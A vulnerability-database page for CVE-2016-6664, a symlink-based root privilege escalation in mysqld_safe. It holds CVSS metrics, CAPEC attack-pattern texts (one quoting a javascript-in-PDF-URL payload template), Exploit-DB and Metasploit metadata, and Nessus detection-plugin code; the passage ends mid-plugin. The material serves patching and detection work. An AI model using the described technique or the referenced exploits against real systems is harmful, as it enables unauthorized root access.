Vulnerabilities > CVE-2016-6664 - Link Following vulnerability in multiple products
Attack vector
LOCAL Attack complexity
HIGH Privileges required
LOW Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
mysqld_safe in Oracle MySQL through 5.5.51, 5.6.x through 5.6.32, and 5.7.x through 5.7.14; MariaDB; Percona Server before 5.5.51-38.2, 5.6.x before 5.6.32-78-1, and 5.7.x before 5.7.14-8; and Percona XtraDB Cluster before 5.5.41-37.0, 5.6.x before 5.6.32-25.17, and 5.7.x before 5.7.14-26.17, when using file-based logging, allows local users with access to the mysql account to gain root privileges via a symlink attack on error logs and possibly other files.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Symlink Attack An attacker positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name. The endpoint file may be either output or input. If the file is output, the result is that the endpoint is modified, instead of a file at the intended location. Modifications to the endpoint file may include appending, overwriting, corrupting, changing permissions, or other modifications. In some variants of this attack the attacker may be able to control the change to a file while in other cases they cannot. The former is especially damaging since the attacker may be able to grant themselves increased privileges or insert false information, but the latter can also be damaging as it can expose sensitive information or corrupt or destroy vital system or application files. Alternatively, the endpoint file may serve as input to the targeted application. This can be used to feed malformed input into the target or to cause the target to process different information, possibly allowing the attacker to control the actions of the target or to cause the target to expose information to the attacker. Moreover, the actions taken on the endpoint file are undertaken with the permissions of the targeted user or application, which may exceed the permissions that the attacker would normally have.
- Accessing, Modifying or Executing Executable Files An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
- Leverage Executable Code in Non-Executable Files An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/) http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
- Manipulating Input to File System Calls An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.
Exploit-Db
description | MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation. CVE-2016-5617,CVE-2016-6664. Local exploit for Linux platform |
file | exploits/linux/local/40679.sh |
id | EDB-ID:40679 |
last seen | 2016-11-02 |
modified | 2016-11-01 |
platform | linux |
port | |
published | 2016-11-01 |
reporter | Dawid Golunski |
source | https://www.exploit-db.com/download/40679/ |
title | MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation |
type | local |
Metasploit
description | [About](<https://www.rapid7.com/about> "About Rapid7" ) [For Customers](<https://www.rapid7.com/for-customers> "For Rapid7 Customers" ) [Free Tools](<https://www.rapid7.com/free-tools> "Free Tools from Rapid7" ) [ ![Rapid7](/db/assets/Rapid7_logo-ec0ec3940fca9dddfbcd754380bb2b50.svg) ](<https://www.rapid7.com> "Rapid7" ) * [Home](<https://www.rapid7.com/> "Rapid7.com" ) * Vulnerability & Exploit Database # Vulnerability & Exploit Database |
id | MSF:EXPLOIT/LINUX/LOCAL/MYSQL_PRIV_ESC |
last seen | 2017-01-23 |
modified | 1970-01-01 |
published | 2016-11-25 |
references | |
reliability | Good |
reporter | Rapid7 |
source | https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/mysql_priv_esc.rb |
title | CVE-2016-6664 MySQL / MariaDB / Percona - Root Privilege Escalation |
Nessus
NASL family Slackware Local Security Checks NASL id SLACKWARE_SSA_2017-018-01.NASL description New mariadb packages are available for Slackware 14.1, 14.2, and -current to fix security issues. last seen 2020-06-01 modified 2020-06-02 plugin id 96612 published 2017-01-19 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96612 title Slackware 14.1 / 14.2 / current : mariadb (SSA:2017-018-01) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Slackware Security Advisory 2017-018-01. The text # itself is copyright (C) Slackware Linux, Inc. # include("compat.inc"); if (description) { script_id(96612); script_version("3.4"); script_cvs_date("Date: 2019/04/10 16:10:18"); script_cve_id("CVE-2016-6664", "CVE-2017-3238", "CVE-2017-3243", "CVE-2017-3244", "CVE-2017-3257", "CVE-2017-3258", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3312", "CVE-2017-3317", "CVE-2017-3318"); script_xref(name:"SSA", value:"2017-018-01"); script_name(english:"Slackware 14.1 / 14.2 / current : mariadb (SSA:2017-018-01)"); script_summary(english:"Checks for updated package in /var/log/packages"); script_set_attribute( attribute:"synopsis", value:"The remote Slackware host is missing a security update." ); script_set_attribute( attribute:"description", value: "New mariadb packages are available for Slackware 14.1, 14.2, and -current to fix security issues." ); # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.435634 script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?48ee8594" ); script_set_attribute( attribute:"solution", value:"Update the affected mariadb package." ); script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:slackware:slackware_linux:mariadb"); script_set_attribute(attribute:"cpe", value:"cpe:/o:slackware:slackware_linux"); script_set_attribute(attribute:"cpe", value:"cpe:/o:slackware:slackware_linux:14.1"); script_set_attribute(attribute:"cpe", value:"cpe:/o:slackware:slackware_linux:14.2"); script_set_attribute(attribute:"patch_publication_date", value:"2017/01/18"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/01/19"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Slackware Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Slackware/release", "Host/Slackware/packages"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("slackware.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Slackware/release")) audit(AUDIT_OS_NOT, "Slackware"); if (!get_kb_item("Host/Slackware/packages")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Slackware", cpu); flag = 0; if (slackware_check(osver:"14.1", pkgname:"mariadb", pkgver:"5.5.54", pkgarch:"i486", pkgnum:"1_slack14.1")) flag++; if (slackware_check(osver:"14.1", arch:"x86_64", pkgname:"mariadb", pkgver:"5.5.54", pkgarch:"x86_64", pkgnum:"1_slack14.1")) flag++; if (slackware_check(osver:"14.2", pkgname:"mariadb", pkgver:"10.0.29", pkgarch:"i586", pkgnum:"1_slack14.2")) flag++; if (slackware_check(osver:"14.2", arch:"x86_64", pkgname:"mariadb", pkgver:"10.0.29", pkgarch:"x86_64", pkgnum:"1_slack14.2")) flag++; if (slackware_check(osver:"current", pkgname:"mariadb", pkgver:"10.0.29", pkgarch:"i586", pkgnum:"1")) flag++; if (slackware_check(osver:"current", arch:"x86_64", pkgname:"mariadb", pkgver:"10.0.29", pkgarch:"x86_64", pkgnum:"1")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get()); else security_warning(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");
NASL family Oracle Linux Local Security Checks NASL id ORACLELINUX_ELSA-2017-2192.NASL description From Red Hat Security Advisory 2017:2192 : An update for mariadb is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. The following packages have been upgraded to a later upstream version: mariadb (5.5.56). (BZ#1458933) Security Fix(es) : * It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600) * A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664) * Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265) * It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291) * Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312) * A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302) * This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464) Additional Changes : For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section. last seen 2020-06-01 modified 2020-06-02 plugin id 102299 published 2017-08-09 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102299 title Oracle Linux 7 : mariadb (ELSA-2017-2192) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2017:2192 and # Oracle Linux Security Advisory ELSA-2017-2192 respectively. # include("compat.inc"); if (description) { script_id(102299); script_version("3.9"); script_cvs_date("Date: 2019/09/27 13:00:38"); script_cve_id("CVE-2016-5483", "CVE-2016-5617", "CVE-2016-6664", "CVE-2017-3238", "CVE-2017-3243", "CVE-2017-3244", "CVE-2017-3258", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3302", "CVE-2017-3308", "CVE-2017-3309", "CVE-2017-3312", "CVE-2017-3313", "CVE-2017-3317", "CVE-2017-3318", "CVE-2017-3453", "CVE-2017-3456", "CVE-2017-3464", "CVE-2017-3600", "CVE-2017-3651"); script_xref(name:"RHSA", value:"2017:2192"); script_name(english:"Oracle Linux 7 : mariadb (ELSA-2017-2192)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Oracle Linux host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "From Red Hat Security Advisory 2017:2192 : An update for mariadb is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. The following packages have been upgraded to a later upstream version: mariadb (5.5.56). (BZ#1458933) Security Fix(es) : * It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600) * A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664) * Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265) * It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291) * Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312) * A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302) * This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464) Additional Changes : For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section." ); script_set_attribute( attribute:"see_also", value:"https://oss.oracle.com/pipermail/el-errata/2017-August/007090.html" ); script_set_attribute( attribute:"solution", value:"Update the affected mariadb packages." ); script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mariadb"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mariadb-bench"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mariadb-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mariadb-embedded"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mariadb-embedded-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mariadb-libs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mariadb-server"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mariadb-test"); script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:7"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/10/25"); script_set_attribute(attribute:"patch_publication_date", value:"2017/08/08"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/08/09"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Oracle Linux Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/OracleLinux")) audit(AUDIT_OS_NOT, "Oracle Linux"); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || !pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux)", string:release)) audit(AUDIT_OS_NOT, "Oracle Linux"); os_ver = pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Oracle Linux"); os_ver = os_ver[1]; if (! preg(pattern:"^7([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Oracle Linux 7", "Oracle Linux " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu); if ("x86_64" >!< cpu) audit(AUDIT_ARCH_NOT, "x86_64", cpu); flag = 0; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"mariadb-5.5.56-2.el7")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"mariadb-bench-5.5.56-2.el7")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"mariadb-devel-5.5.56-2.el7")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"mariadb-embedded-5.5.56-2.el7")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"mariadb-embedded-devel-5.5.56-2.el7")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"mariadb-libs-5.5.56-2.el7")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"mariadb-server-5.5.56-2.el7")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"mariadb-test-5.5.56-2.el7")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "mariadb / mariadb-bench / mariadb-devel / mariadb-embedded / etc"); }
NASL family SuSE Local Security Checks NASL id SUSE_SU-2017-0412-1.NASL description This mariadb version update to 10.0.29 fixes the following issues : - CVE-2017-3318: unspecified vulnerability affecting Error Handling (bsc#1020896) - CVE-2017-3317: unspecified vulnerability affecting Logging (bsc#1020894) - CVE-2017-3312: insecure error log file handling in mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873) - CVE-2017-3291: unrestricted mysqld_safe last seen 2020-06-01 modified 2020-06-02 plugin id 97064 published 2017-02-08 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/97064 title SUSE SLED12 / SLES12 Security Update : mariadb (SUSE-SU-2017:0412-1) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from SUSE update advisory SUSE-SU-2017:0412-1. # The text itself is copyright (C) SUSE. # include("compat.inc"); if (description) { script_id(97064); script_version("3.8"); script_cvs_date("Date: 2019/09/11 11:22:14"); script_cve_id("CVE-2016-6664", "CVE-2017-3238", "CVE-2017-3243", "CVE-2017-3244", "CVE-2017-3257", "CVE-2017-3258", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3312", "CVE-2017-3317", "CVE-2017-3318"); script_name(english:"SUSE SLED12 / SLES12 Security Update : mariadb (SUSE-SU-2017:0412-1)"); script_summary(english:"Checks rpm output for the updated packages."); script_set_attribute( attribute:"synopsis", value:"The remote SUSE host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "This mariadb version update to 10.0.29 fixes the following issues : - CVE-2017-3318: unspecified vulnerability affecting Error Handling (bsc#1020896) - CVE-2017-3317: unspecified vulnerability affecting Logging (bsc#1020894) - CVE-2017-3312: insecure error log file handling in mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873) - CVE-2017-3291: unrestricted mysqld_safe's ledir (bsc#1020884) - CVE-2017-3265: unsafe chmod/chown use in init script (bsc#1020885) - CVE-2017-3258: unspecified vulnerability in the DDL component (bsc#1020875) - CVE-2017-3257: unspecified vulnerability affecting InnoDB (bsc#1020878) - CVE-2017-3244: unspecified vulnerability affecing the DML component (bsc#1020877) - CVE-2017-3243: unspecified vulnerability affecting the Charsets component (bsc#1020891) - CVE-2017-3238: unspecified vulnerability affecting the Optimizer component (bsc#1020882) - CVE-2016-6664: Root Privilege Escalation (bsc#1008253) - Applications using the client library for MySQL (libmysqlclient.so) had a use-after-free issue that could cause the applications to crash (bsc#1022428) - notable changes : - XtraDB updated to 5.6.34-79.1 - TokuDB updated to 5.6.34-79.1 - Innodb updated to 5.6.35 - Performance Schema updated to 5.6.35 Release notes and changelog : - https://kb.askmonty.org/en/mariadb-10029-release-notes - https://kb.askmonty.org/en/mariadb-10029-changelog Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1008253" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020868" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020873" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020875" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020877" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020878" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020882" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020884" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020885" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020891" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020894" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020896" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1022428" ); # https://kb.askmonty.org/en/mariadb-10029-changelog script_set_attribute( attribute:"see_also", value:"https://mariadb.com/kb/en/library/mariadb-10029-changelog/" ); # https://kb.askmonty.org/en/mariadb-10029-release-notes script_set_attribute( attribute:"see_also", value:"https://mariadb.com/kb/en/library/mariadb-10029-release-notes/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2016-6664/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3238/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3243/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3244/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3257/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3258/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3265/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3291/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3312/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3317/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3318/" ); # https://www.suse.com/support/update/announcement/2017/suse-su-20170412-1/ script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?14c3ceff" ); script_set_attribute( attribute:"solution", value: "To install this SUSE Security Update use YaST online_update. Alternatively you can run the command listed for your product : SUSE Linux Enterprise Workstation Extension 12-SP2:zypper in -t patch SUSE-SLE-WE-12-SP2-2017-207=1 SUSE Linux Enterprise Workstation Extension 12-SP1:zypper in -t patch SUSE-SLE-WE-12-SP1-2017-207=1 SUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t patch SUSE-SLE-SDK-12-SP2-2017-207=1 SUSE Linux Enterprise Software Development Kit 12-SP1:zypper in -t patch SUSE-SLE-SDK-12-SP1-2017-207=1 SUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t patch SUSE-SLE-RPI-12-SP2-2017-207=1 SUSE Linux Enterprise Server 12-SP2:zypper in -t patch SUSE-SLE-SERVER-12-SP2-2017-207=1 SUSE Linux Enterprise Server 12-SP1:zypper in -t patch SUSE-SLE-SERVER-12-SP1-2017-207=1 SUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch SUSE-SLE-DESKTOP-12-SP2-2017-207=1 SUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2017-207=1 To bring your system up-to-date, use 'zypper patch'." ); script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:libmysqlclient18"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:libmysqlclient18-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:libmysqlclient_r18"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mariadb"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mariadb-client"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mariadb-client-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mariadb-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mariadb-debugsource"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mariadb-errormessages"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mariadb-tools"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mariadb-tools-debuginfo"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:12"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/12/13"); script_set_attribute(attribute:"patch_publication_date", value:"2017/02/07"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/02/08"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) || release !~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "SUSE"); os_ver = pregmatch(pattern: "^(SLE(S|D)\d+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "SUSE"); os_ver = os_ver[1]; if (! preg(pattern:"^(SLED12|SLES12)$", string:os_ver)) audit(AUDIT_OS_NOT, "SUSE SLED12 / SLES12", "SUSE " + os_ver); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if (cpu !~ "^i[3-6]86$" && "x86_64" >!< cpu && "s390x" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SUSE " + os_ver, cpu); sp = get_kb_item("Host/SuSE/patchlevel"); if (isnull(sp)) sp = "0"; if (os_ver == "SLES12" && (! preg(pattern:"^(1|2)$", string:sp))) audit(AUDIT_OS_NOT, "SLES12 SP1/2", os_ver + " SP" + sp); if (os_ver == "SLED12" && (! preg(pattern:"^(1|2)$", string:sp))) audit(AUDIT_OS_NOT, "SLED12 SP1/2", os_ver + " SP" + sp); flag = 0; if (rpm_check(release:"SLES12", sp:"1", reference:"libmysqlclient18-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"libmysqlclient18-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"mariadb-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", 